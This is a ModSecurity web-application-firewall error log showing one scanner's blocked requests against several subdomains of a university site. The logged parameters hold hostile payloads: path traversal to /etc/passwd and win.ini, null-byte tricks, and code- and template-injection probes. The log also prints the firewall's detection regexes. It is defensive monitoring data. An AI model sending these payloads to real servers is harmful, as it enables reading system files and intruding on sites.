[Tue Aug 29 11:45:13.395205 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAgzyTIAAAAF"]
[Tue Aug 29 11:45:13.395787 2023] [:error] [pid 2169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO132cCo-f0AAAh5RWoAAAA3"]
[Tue Aug 29 11:45:13.410732 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAheaYMAAAAY"]
[Tue Aug 29 11:45:13.414403 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAfiYtsAAAAg"]
[Tue Aug 29 11:45:14.430297 2023] [:error] [pid 2142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132sCo-f0AAAheaYQAAAAY"]
[Tue Aug 29 11:45:14.439147 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132sCo-f0AAAhxwlsAAAAv"]
[Tue Aug 29 11:45:15.369576 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhtjcQAAAAq"]
[Tue Aug 29 11:45:15.372856 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAfGaiIAAAAT"]
[Tue Aug 29 11:45:15.374663 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhrqG8AAAAo"]
[Tue Aug 29 11:45:15.378010 2023] [:error] [pid 2138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhab90AAAAW"]
[Tue Aug 29 11:45:15.384304 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhT3w0AAAAD"]
[Tue Aug 29 11:45:15.407068 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1328Co-f0AAAh3f7AAAAA1"]
[Tue Aug 29 11:45:16.394126 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhrqHIAAAAo"]
[Tue Aug 29 11:45:16.401355 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhhcwkAAAAd"]
[Tue Aug 29 11:45:16.412820 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/search/"] [unique_id "ZO133MCo-f0AAAdQ3zAAAAAV"]
[Tue Aug 29 11:45:16.415886 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhtjccAAAAq"]
[Tue Aug 29 11:45:16.416092 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAfbkwYAAAAZ"]
[Tue Aug 29 11:45:16.433607 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAhvjWMAAAAs"]
[Tue Aug 29 11:45:17.360244 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhhcwsAAAAd"]
[Tue Aug 29 11:45:17.370535 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhlz4QAAAAi"]
[Tue Aug 29 11:45:17.376766 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAh4DYMAAAA2"]
[Tue Aug 29 11:45:17.390052 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAfSWjEAAAAB"]
[Tue Aug 29 11:45:17.393654 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhlz4UAAAAi"]
[Tue Aug 29 11:45:17.408062 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhZReEAAAAG"]
[Tue Aug 29 11:45:17.413986 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAgzyTsAAAAF"]
[Tue Aug 29 11:45:17.414988 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhxwmMAAAAv"]
[Tue Aug 29 11:45:17.419420 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhmFREAAAAj"]
[Tue Aug 29 11:45:17.420851 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAfg78AAAAAe"]
[Tue Aug 29 11:45:18.362165 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133sCo-f0AAAfGaiYAAAAT"]
[Tue Aug 29 11:45:18.413895 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133sCo-f0AAAe3@KYAAAAA"]
[Tue Aug 29 11:45:18.419669 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133sCo-f0AAAeAW94AAAAu"]
[Tue Aug 29 11:45:19.367996 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhtjc0AAAAq"]
[Tue Aug 29 11:45:19.375884 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAeAW98AAAAu"]
[Tue Aug 29 11:45:19.384658 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAfGaikAAAAT"]
[Tue Aug 29 11:45:19.385483 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhxwmUAAAAv"]
[Tue Aug 29 11:45:19.396405 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhoHL8AAAAl"]
[Tue Aug 29 11:45:19.401131 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO1338Co-f0AAARphK0AAAAU"]
[Tue Aug 29 11:45:19.415102 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAhlz4gAAAAi"]
